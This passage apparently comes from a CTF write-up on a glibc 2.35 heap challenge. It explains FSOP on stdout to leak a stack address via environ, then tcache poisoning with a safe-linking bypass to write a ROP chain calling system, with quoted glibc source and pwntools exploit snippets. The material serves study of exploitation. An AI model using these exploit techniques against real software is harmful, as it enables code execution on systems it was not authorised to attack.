<h1 id="FSOP-on-stdout-to-leak-environ"><a href="#FSOP-on-stdout-to-leak-environ" class="headerlink" title="FSOP on stdout to leak environ"></a>FSOP on stdout to leak environ</h1><p>I didn’t see first that only <code>PARTIAL RELRO</code> was enabled on the libc, so the technique I show you here was thought to face a <code>2.35</code> libc with <code>FULL RELRO</code> enabled that the reason why I didn’t just hiijack some GOT pointers within the libc.</p>
<p>A pretty convenient way to gain code execution when the hooks (<code>__malloc_hook</code>, <code>__free_hook</code>) are not present (since <code>2.32</code> cf <a target="_blank" rel="noopener" href="https://sourceware.org/pipermail/libc-alpha/2021-August/129718.html">this for 2.34</a>) is to leak the address of the stack to then write a ROPchain on it. To leak a stack address we can make use of the <code>environ</code> symbol stored in the dynamic linker, it contains a pointer toward <code>**envp</code>.</p>
<p>To read this pointer we need a read what where primitive! Which can be achieved through a file stream oriented programming (FSOP) attack on <code>stdout</code> for example. To dig more FSOP I advise you to read <a target="_blank" rel="noopener" href="https://nasm.re/posts/onceforall/">this write-up</a> as well as <a target="_blank" rel="noopener" href="https://nasm.re/posts/bookwriter/">this one</a>.</p>
<p>To understand the whole process I’ll try to introduce you to FSOP. First of all the target structure is stdout, we wanna corrupt stdout because it’s used ritght after the <code>fgets</code> that reads the input from the user by the <code>putchar</code> function. Basically on linux “everything is a file” from the character device the any stream (error, input, output, opened file) we can interact with  a resource just by opening it and by getting a file descriptor on it, right ? This way each file descripor has an associated structure called <code>FILE</code> you may have used if you have already done some stuff with files on linux. Here is its definition:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// https://elixir.bootlin.com/glibc/latest/source/libio/bits/types/struct_FILE.h#L49</span></span><br><span class="line"><span class="comment">/* The tag name of this struct is _IO_FILE to preserve historic</span></span><br><span class="line"><span class="comment">   C++ mangled names for functions taking FILE* arguments.</span></span><br><span class="line"><span class="comment">   That name should not be used in new code.  */</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> _<span class="title">IO_FILE</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="type">int</span> _flags;		<span class="comment">/* High-order word is _IO_MAGIC; rest is flags. */</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">/* The following pointers correspond to the C++ streambuf protocol. */</span></span><br><span class="line">  <span class="type">char</span> *_IO_read_ptr;	<span class="comment">/* Current read pointer */</span></span><br><span class="line">  <span class="type">char</span> *_IO_read_end;	<span class="comment">/* End of get area. */</span></span><br><span class="line">  <span class="type">char</span> *_IO_read_base;	<span class="comment">/* Start of putback+get area. */</span></span><br><span class="line">  <span class="type">char</span> *_IO_write_base;	<span class="comment">/* Start of put area. */</span></span><br><span class="line">  <span class="type">char</span> *_IO_write_ptr;	<span class="comment">/* Current put pointer. */</span></span><br><span class="line">  <span class="type">char</span> *_IO_write_end;	<span class="comment">/* End of put area. */</span></span><br><span class="line">  <span class="type">char</span> *_IO_buf_base;	<span class="comment">/* Start of reserve area. */</span></span><br><span class="line">  <span class="type">char</span> *_IO_buf_end;	<span class="comment">/* End of reserve area. */</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">/* The following fields are used to support backing up and undo. */</span></span><br><span class="line">  <span class="type">char</span> *_IO_save_base; <span class="comment">/* Pointer to start of non-current get area. */</span></span><br><span class="line">  <span class="type">char</span> *_IO_backup_base;  <span class="comment">/* Pointer to first valid character of backup area */</span></span><br><span class="line">  <span class="type">char</span> *_IO_save_end; <span class="comment">/* Pointer to end of non-current get area. */</span></span><br><span class="line"></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">IO_marker</span> *_<span class="title">markers</span>;</span></span><br><span class="line"></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">IO_FILE</span> *_<span class="title">chain</span>;</span></span><br><span class="line"></span><br><span class="line">  <span class="type">int</span> _fileno;</span><br><span class="line">  <span class="type">int</span> _flags2;</span><br><span class="line">  <span class="type">__off_t</span> _old_offset; <span class="comment">/* This used to be _offset but it&#x27;s too small.  */</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">/* 1+column number of pbase(); 0 is unknown. */</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">short</span> _cur_column;</span><br><span class="line">  <span class="type">signed</span> <span class="type">char</span> _vtable_offset;</span><br><span class="line">  <span class="type">char</span> _shortbuf[<span class="number">1</span>];</span><br><span class="line"></span><br><span class="line">  _IO_lock_t *_lock;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> _IO_USE_OLD_IO_FILE</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> _<span class="title">IO_FILE_complete</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">IO_FILE</span> _<span class="title">file</span>;</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="type">__off64_t</span> _offset;</span><br><span class="line">  <span class="comment">/* Wide character stream stuff.  */</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">IO_codecvt</span> *_<span class="title">codecvt</span>;</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">IO_wide_data</span> *_<span class="title">wide_data</span>;</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">IO_FILE</span> *_<span class="title">freeres_list</span>;</span></span><br><span class="line">  <span class="type">void</span> *_freeres_buf;</span><br><span class="line">  <span class="type">size_t</span> __pad5;</span><br><span class="line">  <span class="type">int</span> _mode;</span><br><span class="line">  <span class="comment">/* Make sure we don&#x27;t get into trouble again.  */</span></span><br><span class="line">  <span class="type">char</span> _unused2[<span class="number">15</span> * <span class="keyword">sizeof</span> (<span class="type">int</span>) - <span class="number">4</span> * <span class="keyword">sizeof</span> (<span class="type">void</span> *) - <span class="keyword">sizeof</span> (<span class="type">size_t</span>)];</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>Here are brievly role of each fields:</p>
<ul>
<li><code>_flags</code> stands for the behaviour of the stream when a file operation occurs.</li>
<li><code>_IO_read_ptr</code> address of input within the input buffer that has been already used. </li>
<li><code>_IO_read_end</code> end address of the input buffer. </li>
<li><code>_IO_read_base</code> base address of the input buffer.</li>
<li><code>_IO_write_base</code> base address of the ouput buffer.</li>
<li><code>_IO_write_ptr</code> points to the character that hasn’t been printed yet.</li>
<li><code>_IO_write_end</code> end address of the output buffer.</li>
<li><code>_IO_buf_base</code> base address for both input and output buffer.</li>
<li><code>_IO_buf_end</code> end address for both input and output buffer.</li>
<li><code>_chain</code> stands for the single linked list that links of all file streams.</li>
<li><code>_fileno</code> stands for the file descriptor associated to the file.</li>
<li><code>_vtable_offset</code> stands for the offset of the vtable we have to use.</li>
<li><code>_offset</code> stands for the current offset within the file.</li>
</ul>
<p>Relatable flags:</p>
<ul>
<li><code>_IO_USER_BUF</code> During line buffered output, _IO_write_base&#x3D;&#x3D;base() &amp;&amp; epptr()&#x3D;&#x3D;base(). However, ptr() may be anywhere between base() and ebuf(). This forces a call to filebuf::overflow(int C) on every put. If there is more space in the buffer, and C is not a ‘\n’, then C is inserted, and pptr() incremented.</li>
<li><code>_IO_MAGIC</code> Magic number of <code>fp-&gt;_flags</code>.</li>
<li><code>_IO_UNBUFFERED</code> If a filebuf is unbuffered(), the _shortbuf[1] is used as the buffer.</li>
<li><code>_IO_LINKED</code> In the list of all open files.</li>
</ul>
<p>To understand I advise you to read this <a target="_blank" rel="noopener" href="https://ray-cp.github.io/archivers/IO_FILE_arbitrary_read_write">great article</a> about FILE structures. What we gonna do right now is trying to understand the use of <code>stdout</code> during within the <code>putchar</code> function. And we will try to find a code path that will not write the provided argument (in this case the <code>\n</code> taken by <code>putchar</code>) into the output buffer we control but rather flush the file stream to directly print its content and then print the provided argument. This way we could get an arbitrary read by controlling the output buffer.<br>Let’s take a closer look at the <code> __putc_unlocked_body</code> macro:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="comment">// https://elixir.bootlin.com/glibc/latest/source/libio/bits/types/struct_FILE.h#L106</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> __putc_unlocked_body(_ch, _fp)					\</span></span><br><span class="line"><span class="meta">  (__glibc_unlikely ((_fp)-&gt;_IO_write_ptr &gt;= (_fp)-&gt;_IO_write_end)	\</span></span><br><span class="line"><span class="meta">   ? __overflow (_fp, (unsigned char) (_ch))				\</span></span><br><span class="line"><span class="meta">   : (unsigned char) (*(_fp)-&gt;_IO_write_ptr++ = (_ch)))</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>It ends up calling <code>__overflow</code> if there is no more space in the output buffer (<code>(_fp)-&gt;_IO_write_ptr &gt;= (_fp)-&gt;_IO_write_end)</code>). That’s basically the code path we need to trigger to call <code>__overflow</code> instead of just write the provided char into the output buffer.<br>So first condition:</p>
<ul>
<li><code>(_fp)-&gt;_IO_write_ptr &gt;= (_fp)-&gt;_IO_write_end</code></li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// https://elixir.bootlin.com/glibc/latest/source/libio/genops.c#L198</span></span><br><span class="line"><span class="type">int</span></span><br><span class="line">__overflow (FILE *f, <span class="type">int</span> ch)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="comment">/* This is a single-byte stream.  */</span></span><br><span class="line">  <span class="keyword">if</span> (f-&gt;_mode == <span class="number">0</span>)</span><br><span class="line">    _IO_fwide (f, <span class="number">-1</span>);</span><br><span class="line">  <span class="keyword">return</span> _IO_OVERFLOW (f, ch);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Given the file stream isn’t oriented (byte granularity) we directly reach the <code>_IO_OVERFLOW</code> call, now the final goal to get a leak is to reach the <code>_IO_do_write</code> call:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// https://elixir.bootlin.com/glibc/latest/source/libio/fileops.c#L730</span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span></span><br><span class="line">_IO_new_file_overflow (FILE *f, <span class="type">int</span> ch)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">if</span> (f-&gt;_flags &amp; _IO_NO_WRITES) <span class="comment">/* SET ERROR */</span></span><br><span class="line">    &#123;</span><br><span class="line">      f-&gt;_flags |= _IO_ERR_SEEN;</span><br><span class="line">      __set_errno (EBADF);</span><br><span class="line">      <span class="keyword">return</span> EOF;</span><br><span class="line">    &#125;</span><br><span class="line">  <span class="comment">/* If currently reading or no buffer allocated. */</span></span><br><span class="line">  <span class="keyword">if</span> ((f-&gt;_flags &amp; _IO_CURRENTLY_PUTTING) == <span class="number">0</span> || f-&gt;_IO_write_base == <span class="literal">NULL</span>)</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="comment">/* Allocate a buffer if needed. */</span></span><br><span class="line">      <span class="keyword">if</span> (f-&gt;_IO_write_base == <span class="literal">NULL</span>)</span><br><span class="line">	&#123;</span><br><span class="line">	  _IO_doallocbuf (f);</span><br><span class="line">	  _IO_setg (f, f-&gt;_IO_buf_base, f-&gt;_IO_buf_base, f-&gt;_IO_buf_base);</span><br><span class="line">	&#125;</span><br><span class="line">      <span class="comment">/* Otherwise must be currently reading.</span></span><br><span class="line"><span class="comment">	 If _IO_read_ptr (and hence also _IO_read_end) is at the buffer end,</span></span><br><span class="line"><span class="comment">	 logically slide the buffer forwards one block (by setting the</span></span><br><span class="line"><span class="comment">	 read pointers to all point at the beginning of the block).  This</span></span><br><span class="line"><span class="comment">	 makes room for subsequent output.</span></span><br><span class="line"><span class="comment">	 Otherwise, set the read pointers to _IO_read_end (leaving that</span></span><br><span class="line"><span class="comment">	 alone, so it can continue to correspond to the external position). */</span></span><br><span class="line">      <span class="keyword">if</span> (__glibc_unlikely (_IO_in_backup (f)))</span><br><span class="line">	&#123;</span><br><span class="line">	  <span class="type">size_t</span> nbackup = f-&gt;_IO_read_end - f-&gt;_IO_read_ptr;</span><br><span class="line">	  _IO_free_backup_area (f);</span><br><span class="line">	  f-&gt;_IO_read_base -= MIN (nbackup,</span><br><span class="line">				   f-&gt;_IO_read_base - f-&gt;_IO_buf_base);</span><br><span class="line">	  f-&gt;_IO_read_ptr = f-&gt;_IO_read_base;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">      <span class="keyword">if</span> (f-&gt;_IO_read_ptr == f-&gt;_IO_buf_end)</span><br><span class="line">	    f-&gt;_IO_read_end = f-&gt;_IO_read_ptr = f-&gt;_IO_buf_base;</span><br><span class="line">      f-&gt;_IO_write_ptr = f-&gt;_IO_read_ptr;</span><br><span class="line">      f-&gt;_IO_write_base = f-&gt;_IO_write_ptr;</span><br><span class="line">      f-&gt;_IO_write_end = f-&gt;_IO_buf_end;</span><br><span class="line">      f-&gt;_IO_read_base = f-&gt;_IO_read_ptr = f-&gt;_IO_read_end;</span><br><span class="line"></span><br><span class="line">      f-&gt;_flags |= _IO_CURRENTLY_PUTTING;</span><br><span class="line">      <span class="keyword">if</span> (f-&gt;_mode &lt;= <span class="number">0</span> &amp;&amp; f-&gt;_flags &amp; (_IO_LINE_BUF | _IO_UNBUFFERED))</span><br><span class="line">	f-&gt;_IO_write_end = f-&gt;_IO_write_ptr;</span><br><span class="line">    &#125;</span><br><span class="line">  <span class="keyword">if</span> (ch == EOF)</span><br><span class="line">    <span class="keyword">return</span> _IO_do_write (f, f-&gt;_IO_write_base,</span><br><span class="line">			 f-&gt;_IO_write_ptr - f-&gt;_IO_write_base);</span><br><span class="line">  <span class="keyword">if</span> (f-&gt;_IO_write_ptr == f-&gt;_IO_buf_end ) <span class="comment">/* Buffer is really full */</span></span><br><span class="line">    <span class="keyword">if</span> (_IO_do_flush (f) == EOF)</span><br><span class="line">      <span class="keyword">return</span> EOF;</span><br><span class="line">  *f-&gt;_IO_write_ptr++ = ch;</span><br><span class="line">  <span class="keyword">if</span> ((f-&gt;_flags &amp; _IO_UNBUFFERED)</span><br><span class="line">      || ((f-&gt;_flags &amp; _IO_LINE_BUF) &amp;&amp; ch == <span class="string">&#x27;\n&#x27;</span>))</span><br><span class="line">    <span class="keyword">if</span> (_IO_do_write (f, f-&gt;_IO_write_base,</span><br><span class="line">		      f-&gt;_IO_write_ptr - f-&gt;_IO_write_base) == EOF)</span><br><span class="line">      <span class="keyword">return</span> EOF;</span><br><span class="line">  <span class="keyword">return</span> (<span class="type">unsigned</span> <span class="type">char</span>) ch;</span><br><span class="line">&#125;</span><br><span class="line">libc_hidden_ver (_IO_new_file_overflow, _IO_file_overflow)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Given <code>ch</code> is <code>\n</code>, to trigger the <code>_IO_do_flush</code> call which will flush the file stream we have to:</p>
<ul>
<li>Remove <code>_IO_NO_WRITES</code> from <code>fp-&gt;_flags</code> to avoid the first condition.</li>
<li>Add <code>_IO_CURRENTLY_PUTTING</code> to <code>fp-&gt;_flags</code> and give a non <code>NULL</code> value to <code>f-&gt;_IO_write_base</code> to avoid the second condition (useless code).</li>
<li>make <code>f-&gt;_IO_write_ptr</code> equal to <code>f-&gt;_IO_buf_end</code> to then call <code>_IO_do_flush</code>.</li>
</ul>
<p>Now we reached <code>_IO_do_flush</code> which is basically just a macro:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="comment">// https://elixir.bootlin.com/glibc/latest/source/libio/libioP.h#L507</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> _IO_do_flush(_f) \</span></span><br><span class="line"><span class="meta">  ((_f)-&gt;_mode &lt;= 0							      \</span></span><br><span class="line"><span class="meta">   ? _IO_do_write(_f, (_f)-&gt;_IO_write_base,				      \</span></span><br><span class="line"><span class="meta">		  (_f)-&gt;_IO_write_ptr-(_f)-&gt;_IO_write_base)		      \</span></span><br><span class="line"><span class="meta">   : _IO_wdo_write(_f, (_f)-&gt;_wide_data-&gt;_IO_write_base,		      \</span></span><br><span class="line"><span class="meta">		   ((_f)-&gt;_wide_data-&gt;_IO_write_ptr			      \</span></span><br><span class="line"><span class="meta">		    - (_f)-&gt;_wide_data-&gt;_IO_write_base)))</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Given <code>stdout</code> is byte-oriented <code>_IO_new_do_write</code> is called:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="comment">// https://elixir.bootlin.com/glibc/latest/source/libio/fileops.c#L418</span></span><br><span class="line"><span class="type">static</span> <span class="type">size_t</span> <span class="title function_">new_do_write</span> <span class="params">(FILE *, <span class="type">const</span> <span class="type">char</span> *, <span class="type">size_t</span>)</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Write TO_DO bytes from DATA to FP.</span></span><br><span class="line"><span class="comment">   Then mark FP as having empty buffers. */</span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span></span><br><span class="line">_IO_new_do_write (FILE *fp, <span class="type">const</span> <span class="type">char</span> *data, <span class="type">size_t</span> to_do)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">return</span> (to_do == <span class="number">0</span></span><br><span class="line">	  || (<span class="type">size_t</span>) new_do_write (fp, data, to_do) == to_do) ? <span class="number">0</span> : EOF;</span><br><span class="line">&#125;</span><br><span class="line">libc_hidden_ver (_IO_new_do_write, _IO_do_write)</span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="type">size_t</span></span><br><span class="line"><span class="title function_">new_do_write</span> <span class="params">(FILE *fp, <span class="type">const</span> <span class="type">char</span> *data, <span class="type">size_t</span> to_do)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">size_t</span> count;</span><br><span class="line">  <span class="keyword">if</span> (fp-&gt;_flags &amp; _IO_IS_APPENDING)</span><br><span class="line">    <span class="comment">/* On a system without a proper O_APPEND implementation,</span></span><br><span class="line"><span class="comment">       you would need to sys_seek(0, SEEK_END) here, but is</span></span><br><span class="line"><span class="comment">       not needed nor desirable for Unix- or Posix-like systems.</span></span><br><span class="line"><span class="comment">       Instead, just indicate that offset (before and after) is</span></span><br><span class="line"><span class="comment">       unpredictable. */</span></span><br><span class="line">    fp-&gt;_offset = _IO_pos_BAD;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> (fp-&gt;_IO_read_end != fp-&gt;_IO_write_base)</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="type">off64_t</span> new_pos</span><br><span class="line">	= _IO_SYSSEEK (fp, fp-&gt;_IO_write_base - fp-&gt;_IO_read_end, <span class="number">1</span>);</span><br><span class="line">      <span class="keyword">if</span> (new_pos == _IO_pos_BAD)</span><br><span class="line">	    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">      fp-&gt;_offset = new_pos;</span><br><span class="line">    &#125;</span><br><span class="line">  count = _IO_SYSWRITE (fp, data, to_do);</span><br><span class="line">  <span class="keyword">if</span> (fp-&gt;_cur_column &amp;&amp; count)</span><br><span class="line">    fp-&gt;_cur_column = _IO_adjust_column (fp-&gt;_cur_column - <span class="number">1</span>, data, count) + <span class="number">1</span>;</span><br><span class="line">  _IO_setg (fp, fp-&gt;_IO_buf_base, fp-&gt;_IO_buf_base, fp-&gt;_IO_buf_base);</span><br><span class="line">  fp-&gt;_IO_write_base = fp-&gt;_IO_write_ptr = fp-&gt;_IO_buf_base;</span><br><span class="line">  fp-&gt;_IO_write_end = (fp-&gt;_mode &lt;= <span class="number">0</span></span><br><span class="line">		       &amp;&amp; (fp-&gt;_flags &amp; (_IO_LINE_BUF | _IO_UNBUFFERED))</span><br><span class="line">		       ? fp-&gt;_IO_buf_base : fp-&gt;_IO_buf_end);</span><br><span class="line">  <span class="keyword">return</span> count;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>To avoid the <code>_IO_SYSSEEK</code> which could break stdout, we can add <code>_IO_IS_APPENDING</code> to <code>fp-&gt;_flags</code>. Then <code>_IO_SYSWRITE</code> is called and prints <code>(_f)-&gt;_IO_write_ptr-(_f)-&gt;_IO_write_base</code> bytes from <code>(_f)-&gt;_IO_write_base</code> to stdout. But that’s not finished, right after we got the stack leak <code>new_do_write</code> initializes the output &#x2F; input buffer to <code>_IO_buf_base</code> except for the output buffer which is initialized to <code>_IO_buf_end</code> (<code>_IO_LINE_BUF</code> not present). Thus we have to make <code>fp-&gt;_IO_buf_base</code> and <code>fp-&gt;_IO_buf_end</code> equal to valid writable pointers.</p>
<p>Thus we just need to:</p>
<ul>
<li><code>fp-&gt;_flags</code> &#x3D; (<code>fp-&gt;_flags</code> &amp; ~(<code>_IO_NO_WRITES</code>)) | <code>_IO_CURRENTLY_PUTTING</code> | <code>_IO_IS_APPENDING</code>.</li>
<li><code>f-&gt;_IO_write_ptr</code> &#x3D; <code>fp-&gt;_IO_write_end</code> &#x3D; <code>f-&gt;_IO_buf_end</code> &#x3D; <code>&amp;environ + 8</code>.</li>
<li><code>fp-&gt;_IO_write_base</code> &#x3D; <code>&amp;environ</code>.</li>
</ul>
<p>Which gives:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">alloc(<span class="number">3</span>, </span><br><span class="line">    pwn.p64(<span class="number">0xfbad1800</span>) + <span class="comment"># _flags</span></span><br><span class="line">    pwn.p64(environ)*<span class="number">3</span> + <span class="comment"># _IO_read_*</span></span><br><span class="line">    pwn.p64(environ) + <span class="comment"># _IO_write_base</span></span><br><span class="line">    pwn.p64(environ + <span class="number">0x8</span>)*<span class="number">2</span> + <span class="comment"># _IO_write_ptr + _IO_write_end</span></span><br><span class="line">    pwn.p64(environ + <span class="number">8</span>) + <span class="comment"># _IO_buf_base</span></span><br><span class="line">    pwn.p64(environ + <span class="number">8</span>) <span class="comment"># _IO_buf_end</span></span><br><span class="line">    , <span class="number">0x100</span>) </span><br><span class="line"></span><br><span class="line">stack = pwn.u64(io.recv(<span class="number">8</span>)[:-<span class="number">1</span>].ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>)) - <span class="number">0x130</span> - <span class="number">8</span> </span><br><span class="line"><span class="comment"># Offset of the saved rip that belongs to frame of the op_malloc function</span></span><br><span class="line">pwn.log.info(<span class="string">f&quot;stack: <span class="subst">&#123;<span class="built_in">hex</span>(stack)&#125;</span>&quot;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="ROPchain"><a href="#ROPchain" class="headerlink" title="ROPchain"></a>ROPchain</h1><p>Now we leaked the stack address we finally just need to achieve another arbitrary write to craft the ROPchain onto the <code>op_malloc</code> function that writes the user input into the requested chunk.</p>
<p>To get the arbitrary write we just have to use the same overlapping chunks technique than last time, let’s say we wanna write to <code>target</code> and we have <code>prev</code> that overlaps <code>victim</code>:</p>
<ul>
<li><code>free(prev)</code> ends up in the tcachebin (0x140), it has already been consolidated, it <em>already</em> overlaps <code>victim</code>.</li>
<li><code>free(victim)</code> ends up in the tcachebin (0x110).</li>
<li><code>malloc(0x130)</code> returns <code>prev</code>, thus we can corrupt <code>victim-&gt;next</code> and intialize it to <code>(target ^ ((chunk_location) &gt;&gt; 12)</code> to bypass safe-linking.</li>
<li><code>malloc(0x100)</code> returns <code>victim</code> and tcachebin (0x110) next free chunk is <code>target</code>.</li>
<li><code>malloc(0x100)</code> gives a write what where.</li>
</ul>
<p>When we got the write what where on the stack we simply have to craft a call ot system since there is no <code>seccomp</code> shit.<br>Here is the script:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">free(<span class="number">1</span>) <span class="comment"># prev</span></span><br><span class="line">free(<span class="number">2</span>) <span class="comment"># victim</span></span><br><span class="line"></span><br><span class="line">alloc(<span class="number">5</span>, <span class="string">b&quot;T&quot;</span>*<span class="number">0x108</span> + pwn.p64(<span class="number">0x111</span>) + pwn.p64((stack ^ ((heap + <span class="number">0xb20</span>) &gt;&gt; <span class="number">12</span>))), <span class="number">0x130</span>)</span><br><span class="line"><span class="comment"># victim-&gt;next = target</span></span><br><span class="line">alloc(<span class="number">2</span>, <span class="string">b&quot;TT&quot;</span>, <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">3</span>, pwn.p64(stack) + rop.chain(), <span class="number">0x100</span>) <span class="comment"># overwrite sRBP for nothing lmao</span></span><br><span class="line"><span class="comment"># ROPchain on do_malloc&#x27;s stackframe</span></span><br></pre></td></tr></table></figure>

<p>And here we are:</p>
